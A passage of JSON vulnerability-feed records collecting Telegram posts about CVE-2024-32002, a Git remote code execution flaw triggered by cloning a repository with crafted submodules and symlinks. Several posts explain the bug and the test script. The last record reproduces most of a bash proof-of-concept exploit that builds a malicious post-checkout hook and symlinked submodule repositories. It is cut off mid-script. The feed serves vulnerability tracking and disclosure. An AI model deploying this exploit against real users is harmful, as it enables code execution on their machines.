"https://t.me/orderofsixangles/2278", "content": "Exploiting CVE-2024-32002: RCE via git clone\n\nhttps://amalmurali.me/posts/git-rce/", "creation_timestamp": "2024-05-20T10:13:21.000000Z"}, {"uuid": "eb2cd3b7-af2e-40a4-b4a7-18c16d83c874", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "Telegram/qhX3_xr89BIwKtdbCw4aj_7nCv1kS1RppnrElOVH2el3Pmc", "content": "", "creation_timestamp": "2025-07-22T09:00:04.000000Z"}, {"uuid": "c4c135ec-ab4d-407a-8342-7aef72892896", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/poxek/4033", "content": "\u2757\ufe0f RCE \u0447\u0435\u0440\u0435\u0437 git clone \u2757\ufe0f\nCVE-2024-32002\n\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438: \u043f\u0440\u043e\u0441\u0442\u0430\u044f\n#RCE #CVE #git\n\n\u27a1\ufe0f\u0418\u0434\u0435\u044f \u043e \u0442\u043e\u043c, \u0447\u0442\u043e RCE \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0434\u043e\u0441\u0442\u0438\u0433\u043d\u0443\u0442\u0430 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 git clone.\n\u0412\u0430\u0436\u043d\u043e\u0435 \u0437\u0430\u043c\u0435\u0447\u0430\u043d\u0438\u0435: \u0430\u0442\u0430\u043a\u0430 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u0441\u044b\u043b\u043e\u043a, \u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u0432\u044b\u043a\u043b\u044e\u0447\u0438\u0432 \u0438\u0445 git config --global core.symlinks false\n\n\u27a1\ufe0f\u0412\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u044f\u044f \u043a\u0443\u0445\u043d\u044f git'\u0430\ngit - \u044d\u0442\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0432\u0435\u0440\u0441\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u043a\u043e\u0434\u0435 \u0441 \u0442\u0435\u0447\u0435\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0438. \u041e\u043d\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043b\u043e\u0436\u043d\u044b\u043c\u0438 \u043f\u0440\u043e\u0435\u043a\u0442\u0430\u043c\u0438, \u0440\u0430\u0437\u0434\u0435\u043b\u044f\u044f \u0438\u0445 \u043d\u0430 \u0431\u043e\u043b\u0435\u0435 \u043c\u0435\u043b\u043a\u0438\u0435, \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u043a\u0443\u0441\u043a\u0438, \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\u043c\u0438. \u0427\u0442\u043e\u0431\u044b \u0435\u0449\u0435 \u0431\u043e\u043b\u044c\u0448\u0435 \u0443\u043f\u0440\u043e\u0441\u0442\u0438\u0442\u044c \u044d\u0442\u043e\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441, Git \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043f\u043e\u0434\u043c\u043e\u0434\u0443\u043b\u0438 - \u043f\u043e \u0441\u0443\u0442\u0438, \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438, \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u0432 \u0434\u0440\u0443\u0433\u0438\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438. \u0417\u0430\u043f\u043e\u043c\u043d\u0438\u0442\u0435 \u044d\u0442\u0443 \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u044e.\n\n\u041a\u0430\u0436\u0434\u044b\u0439 \u043f\u043e\u0434\u043c\u043e\u0434\u0443\u043b\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u043c \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438. Git \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442 \u043f\u0443\u0442\u044c \u043a \u043f\u043e\u0434\u043c\u043e\u0434\u0443\u043b\u044e, \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u044f \u0442\u043e\u0447\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439. \u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u0442\u044c \u043e\u0434\u043d\u0430 \u0437\u0430\u0433\u0432\u043e\u0437\u0434\u043a\u0430: \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445, \u043d\u0435 \u0447\u0443\u0432\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043a \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0443 (\u043a\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 Windows \u0438 macOS \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e), A/modules/x \u0438 a/modules/x \u0441\u0447\u0438\u0442\u0430\u044e\u0442\u0441\u044f \u043e\u0434\u043d\u0438\u043c \u0438 \u0442\u0435\u043c \u0436\u0435 \u043f\u0443\u0442\u0435\u043c. \u042d\u0442\u0430, \u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b, \u043c\u0435\u043b\u043e\u0447\u044c - \u044d\u0442\u043e \u0411\u0410\u0417\u0410 \u0434\u043b\u044f CVE-2024-32002.\n\n\u27a1\ufe0f\u0421\u0438\u043c\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0441\u0441\u044b\u043b\u043a\u0438\n\u0421\u0438\u043c\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0441\u0441\u044b\u043b\u043a\u0438 - \u044d\u0442\u043e \u043e\u0431\u044a\u0435\u043a\u0442\u044b \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043b\u0443\u0436\u0430\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044f\u043c\u0438 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0444\u0430\u0439\u043b\u044b \u0438\u043b\u0438 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0438. \u0412 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 Git \u043e\u043d\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0447\u0430\u0441\u0442\u0438 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f. \u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0443\u0434\u043e\u0431\u0441\u0442\u0432\u043e, \u0441\u0438\u043c\u043b\u0438\u043d\u043a\u0438 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0432\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0446\u0435\u043b\u044f\u0445.\n\n\u27a1\ufe0f\u0427\u0435\u043a\u0430\u0435\u043c \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u043a\u043e\u043c\u043c\u0438\u0442\u0430\u0445\n\u0412\u0441\u0435\u0433\u043e \u0431\u044b\u043b\u043e \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u043e 2 \u0444\u0430\u0439\u043b\u0430, builtin/submodule--helper.c \u0438 t/t7406-submodule-update.sh\n\n\u27a1\ufe0f\u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c builtin/submodule--helper.c\n\u0421\u0444\u043e\u043a\u0443\u0441\u0438\u0440\u0443\u0435\u043c\u0441\u044f \u043d\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 clone_submodule, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043a\u0430\u043a \u0432\u044b \u043c\u043e\u0433\u043b\u0438 \u0434\u043e\u0433\u0430\u0434\u0430\u0442\u044c\u0441\u044f, \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442\u0441\u044f \u043a\u043b\u043e\u043d\u0438\u0440\u0443\u0435\u043c.\n\u25aa\ufe0f\u041d\u043e\u0432\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f dir_contains_only_dotgit: \u042d\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442, \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043b\u0438 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u0442\u043e\u043b\u044c\u043a\u043e \u0444\u0430\u0439\u043b \u0438\u043b\u0438 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 .git. \u0415\u0441\u043b\u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u0434\u0440\u0443\u0433\u0438\u0435 \u0444\u0430\u0439\u043b\u044b \u0438\u043b\u0438 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0438, \u043e\u043d\u0430 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u043e\u0448\u0438\u0431\u043a\u0443. \u042d\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0447\u0442\u043e\u0431\u044b \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u0443\u044e \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044c \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0438\u043c\u043b\u0438\u043d\u043a\u043e\u0432.\n\u25aa\ufe0f\u0418\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 clone_submodule: \u041f\u0440\u0435\u0436\u0434\u0435 \u0447\u0435\u043c \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u0442\u044c \u043a \u043a\u043b\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044e, Git \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442, \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043b\u0438 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u0441\u0443\u0431\u043c\u043e\u0434\u0443\u043b\u044f \u0438 \u043f\u0443\u0441\u0442 \u043b\u0438 \u043e\u043d. \u0415\u0441\u043b\u0438 \u043d\u0435\u0442, \u043e\u043d \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u0435\u0442 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044e, \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u043e\u0439 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438.\u0418\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 clone_submodule: \u041f\u0440\u0435\u0436\u0434\u0435 \u0447\u0435\u043c \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u0442\u044c \u043a \u043a\u043b\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044e, Git \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442, \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043b\u0438 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u0441\u0443\u0431\u043c\u043e\u0434\u0443\u043b\u044f \u0438 \u043f\u0443\u0441\u0442 \u043b\u0438 \u043e\u043d. \u0415\u0441\u043b\u0438 \u043d\u0435\u0442, \u043e\u043d \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u0435\u0442 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044e, \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u043e\u0439 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438.\n\n\u27a1\ufe0f\u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c t/t7406-submodule-update.sh\n1. \u0413\u043b\u043e\u0431\u0430\u043b\u044c\u043d\u0430\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\ntest_config_global protocol.file.allow always &&\ntest_config_global core.symlinks true &&\ntell_tale_path=\"$PWD/tell.tale\" &&\n\u0421\u043a\u0440\u0438\u043f\u0442 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 Git: protocol.file.allow \u0432\u0441\u0435\u0433\u0434\u0430 \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0439 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b \u0434\u043b\u044f Git. core.symlinks true \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u0441\u0438\u043c\u043b\u0438\u043d\u043a\u043e\u0432.\n\u0422\u0430\u043a\u0436\u0435 \u0441\u043a\u0440\u0438\u043f\u0442 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u0442 tell_tale_path \u043a\u0430\u043a \u0444\u0430\u0439\u043b-\u043c\u0430\u0440\u043a\u0435\u0440 \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0440\u0430\u0431\u043e\u0442\u043e\u0441\u043f\u043e\u0441\u043e\u0431\u043d\u043e\u0441\u0442\u0438 RCE.\n\n2. \u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430 hook \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\ngit init hook &&\n(\n    cd hook &&\n    mkdir -p y/hooks &&\n    write_script y/hooks/post-checkout <<-EOF &&\n    echo HOOK-RUN >&2\n    echo hook-run >\"$tell_tale_path\"\n    EOF\n    git add y/hooks/post-checkout &&\n    test_tick &&\n    git commit -m post-checkout\n) &&\n\u0418\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442 \u043d\u043e\u0432\u044b\u0439 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c hook.\n\u0421\u043e\u0437\u0434\u0430\u0435\u0442 \u043f\u043e\u0441\u0442-\u0447\u0435\u043a\u0430\u0443\u0442 \u0445\u0443\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 hook-run \u0432 tell_tale_path.\n\u041a\u043e\u043c\u043c\u0438\u0442\u0438\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u0445\u0443\u043a\u0430 \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439 hook.\n\n3. \u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430 main \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\nhook_repo_path=\"$(pwd)/hook\" &&\ngit init captain &&\n(\n    cd captain &&\n    git submodule add --name x/y \"$hook_repo_path\" A/modules/x &&\n    test_tick &&\n    git commit -m add-submodule &&\n    printf .git >dotgit.txt &&\n    git hash-object -w --stdin dot-git.hash &&\n    printf \"120000 %s 0\\ta\\n\" \"$(cat dot-git.hash)\" >index.info &&\n    git update-index --index-info <index.info &&\n    test_tick &&\n    git commit -m add-symlink\n) &&\n\u041e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u0442 \u043f\u0443\u0442\u044c \u043a \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0443 hook'\u043e\u0432.\n\u0418\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442 \u0434\u0440\u0443\u0433\u043e\u0439 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c captain.\n\u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439 hook \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043e\u0434\u043c\u043e\u0434\u0443\u043b\u044f \u0432 A/modules/x \u0438 \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u0435\u0442 \u044d\u0442\u043e \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435.\n\u0421\u043e\u0437\u0434\u0430\u0435\u0442 \u0441\u0438\u043c\u043b\u0438\u043d\u043a, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0439 \u043d\u0430 .git, \u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0435\u0442 \u0438\u043d\u0434\u0435\u043a\u0441 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0433\u043e \u0441\u0438\u043c\u043b\u0438\u043d\u043a\u0430.", "creation_timestamp": "2024-05-20T10:04:34.000000Z"}, {"uuid": "3951615b-e2f2-413a-b9ef-53fb43a8160b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "seen", "source": "https://t.me/poxek/4036", "content": "\u2757\ufe0f RCE \u0447\u0435\u0440\u0435\u0437 git clone \u2757\ufe0f\nCVE-2024-32002\n\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438: \u043f\u0440\u043e\u0441\u0442\u0430\u044f\n#RCE #CVE #git\n\n\u26a0\ufe0f \u0427\u0438\u0442\u0430\u0442\u044c \u0432 Teletype\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-05-20T10:10:54.000000Z"}, {"uuid": "c40c05ab-76c9-42d8-bc18-505ba91f3b0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "Telegram/aXAH-2DfDqzkwZVQTL_OU-cCOTeS5x3sz3t3qhT_Lr4Gbw", "content": "", "creation_timestamp": "2024-05-24T13:35:38.000000Z"}, {"uuid": "7a6fc1b5-9fe6-49af-8d83-8790bec6ce8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/ptswarm/209", "content": "Exploiting CVE-2024-32002: RCE via git clone\n\n\ud83d\udc64 by Amal Murali\n\nA new RCE in Git caught researcher's attention on a recent security feed, labeled CVE-2024-32002. The idea of an RCE being triggered through a simple git clone command fascinated him. Given Git\u2019s ubiquity and the widespread use of the clone command, he was instantly intrigued. Could something as routine as cloning a repository really open the door to remote code execution? His curiosity was piqued, and he had to investigate. Plus, who doesn\u2019t want an excuse to break stuff in the name of research?\n\nWhat\u2019s the fun in just reading about an RCE? He wanted to see it wreak havoc \u2013 maybe launch a rogue application, or worse, wipe out his directories. At least, he wanted it to pop his calculator. In this post, He will walk you through his journey of reversing the Git RCE, from initial discovery to crafting a working exploit.\n\n\ud83d\udcdd Contents:\n\u25cf Basic Reconnaissance\n    \u2022 git under the hood\n    \u2022 Symlinks\n\u25cf Digging into the source code\n    \u2022 Inspecting builtin/submodule--helper.c\n    \u2022 Inspecting t/t7406-submodule-update.sh\n\u25cf Piecing everything together\n\u25cf Getting the RCE\n    \u2022 Weaponizing a GitHub repository\n\u25cf Working PoC\n\nhttps://amalmurali.me/posts/git-rce/", "creation_timestamp": "2024-05-20T08:15:43.000000Z"}, {"uuid": "db57baa0-d4e5-468c-9d1c-73c34d004de5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "Telegram/Phq6NDtg2n013dbzs-TB6Z5ep_V4d2KL4M8iglLDFLVgQw", "content": "", "creation_timestamp": "2024-05-20T17:44:43.000000Z"}, {"uuid": "4b4b1ddb-00ea-42ca-b7d7-d4f30769aee3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/363", "content": "\ud83d\udea8POC RELEASED\ud83d\udea8CVE-2024-32002: Exploiting Git RCE via git clone. UPDATE IMMEDIATELY!!!\n\n#DarkWeb #Cybersecurity #Security #Cyberattack #Cybercrime #Privacy #Infosec #CVE202432002 #Vulnerability\n\nhttps://github.com/amalmurali47/git_rce\n\nhttps://x.com/DarkWebInformer/status/1792981407171481652", "creation_timestamp": "2024-05-21T20:16:17.000000Z"}, {"uuid": "1851655f-9b6e-413f-99b8-3f738cbb71d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "seen", "source": "https://t.me/DARK_SPOT_TEAM/462", "content": "\u2757\ufe0f RCE via git clone \u2757\ufe0f\nCVE-2024-32002\nExploitation Difficulty: Easy\n#RCE #CVE #git\n\n\u27a1\ufe0fThe idea that RCE can be achieved with a simple git clone command.\nImportant note: the attack works due to enabled symbolic links, hence the attack can be avoided by disabling them with git config --global core.symlinks false\n\n\u27a1\ufe0fInside Git's workings\nGit is a version control system that tracks changes in code over time. It manages complex projects by breaking them down into smaller, manageable pieces called repositories. To simplify this process even further, Git uses submodules - essentially, repositories nested within other repositories. Remember this concept.\n\nEach submodule resides in a specific directory in the main repository. Git tracks the path to the submodule, ensuring an accurate record of changes. However, there's a catch: in file systems not sensitive to case (like in Windows and macOS by default), A/modules/x and a/modules/x are considered the same path. This seemingly minor detail is the BASIS for CVE-2024-32002.\n\n\u27a1\ufe0fSymbolic Links\nSymbolic links are filesystem objects that serve as pointers to other files or directories. In the context of Git, they can be used to refer to other parts of the repository. Despite their convenience, symlinks can also be used for malicious purposes.\n\n\u27a1\ufe0fChecking changes in commits\nTwo files were changed, builtin/submodule--helper.c and t/t7406-submodule-update", "creation_timestamp": "2024-05-21T13:12:30.000000Z"}, {"uuid": "3e60e465-a953-4566-9a61-3002ed67e863", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/544", "content": "\u200aGit Patches Critical RCE Vulnerabilities \u2013 CVE-2024-32002 & CVE-2024-32004\n\nhttps://securityonline.info/git-patches-critical-rce-vulnerabilities-cve-2024-32002-cve-2024-32004/", "creation_timestamp": "2024-05-16T13:18:50.000000Z"}, {"uuid": "4c602947-85c9-4f9c-9d09-58c19503e089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/252", "content": "CVE-2024-32002 GIT RCE\n\n\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0432 \u043f\u043e\u0434\u043c\u043e\u0434\u0443\u043b\u044f\u0445 Git.\nPayload \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0432\u043d\u043e\u0435 \u043a\u043b\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f Git.\n\u26d4\n\n#!/bin/bash\n\n# Define repository paths\nHULK_REPO=\"git@github.com:safebuffer/hulk.git\"\npullme_REPO=\"git@github.com:safebuffer/submod.git\"\n\n# Final Exploit Repo\nSMASH_REPO=\"git@github.com:safebuffer/smash.git\"\n\n# Function to clone and set up the hook repository\nsetup_HULK_REPO() {\n # Remove existing directories\n rm -rf hulk*\n\n git clone \"$HULK_REPO\" hulk\n\n # Navigate to the hook repository\n cd hulk/ || exit\n\n # Create necessary directories and set up the post-checkout hook\n mkdir -p y/hooks\n cp ./.git/hooks/post-update.sample y/hooks/post-checkout # so u won't get the hook ignored\n echo \"/System/Applications/Calculator.app/Contents/MacOS/Calculator\" > y/hooks/post-checkout\n\n # Add and commit the post-checkout hook\n git add y/hooks/post-checkout\n git update-index --chmod=+x y/hooks/post-checkout\n git commit -m \"Add executable post-checkout hook\"\n\n # Push changes to the remote repository\n git push\n\n # Return to the parent directory\n cd ..\n}\n\n# Function to clone and set up the pullme repository with a submodule\nsetup_pullme_repo() {\n # Remove existing directories\n rm -rf pullme*\n\n # Clone the pullme repository\n git clone \"$pullme_REPO\" pullme\n\n # Navigate to the pullme repository\n cd pullme || exit\n\n # Clean up previous directories and remove submodule\n rm -rf a* A*\n git rm -r A/modules/x\n\n # Add the hook repository as a submodule\n git submodule add --name x/y \"$HULK_REPO\" A/modules/x\n git commit -m \"Add submodule\"\n\n # Create a symlink to the .git directory\n # Print the string \".git\" to a file named dotgit.txt\n printf .git > dotgit.txt\n\n # Generate a hash for the contents of dotgit.txt and store it in dot-git.hash\n # The `-w` option writes the object to the object database, and the hash is output\n git hash-object -w --stdin < dotgit.txt > dot-git.hash\n\n # Create an index info line for a symbolic link with the mode 120000\n # The line is formatted as: \"120000  0\\ta\"\n # 120000 indicates a symbolic link,  is the content hash, and 'a' is the path in the index\n printf \"120000 %s 0\\ta\\n\" \"$(cat dot-git.hash)\" > index.info\n\n # Update the git index with the information from index.info\n # This effectively stages the symbolic link for the next commit\n git update-index --index-info < index.info\n\n # Commit the staged changes with a message \"Add symlink\"\n git commit -m \"Add symlink\"\n # Push changes to the remote repository\n git push\n\n # Return to the parent directory\n cd ..\n}\n\n# Function to clone the smash repository with 